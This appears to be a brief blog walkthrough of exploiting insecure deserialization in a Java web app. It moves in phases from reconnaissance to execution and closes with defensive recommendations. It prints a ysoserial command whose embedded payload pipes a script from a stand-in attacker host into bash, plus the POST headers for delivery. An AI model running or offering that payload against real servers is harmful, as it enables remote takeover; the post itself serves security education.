Exploiting Insecure Deserialization in Java Web App.
- Trung Le
- Jul 26
- 1 min read
Phase 1 – Reconnaissance
🔴 Attacker identifies a Java-based application that uses serialized Java objects in cookies or POST requests.
Exploit Payload
🔴 Uses a crafted payload generated via ysoserial
java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/shell.sh | bash' > payload.ser
Phase 2 – Delivery
🔴 Sends the payload to the vulnerable endpoint.
POST /login HTTP/1.1
Content-Type: application/x-java-serialized-object
Phase 3 – Execution
🔴 Server deserializes object and executes embedded command.
Impact:
🔴 Remote command execution
🔴 Possible reverse shell or malware installation
Weaknesses Exploited
🔴 Java deserialization without input validation
🔴 No sandboxing or filtering
Defensive Recommendations
🔴 Never deserialize untrusted data
🔴 Use object whitelisting (look-ahead deserialization)
🔴 Apply input validation on all serialized objects
🔴 Implement security logging and detection for RCE patterns
[binary payload...]
Comments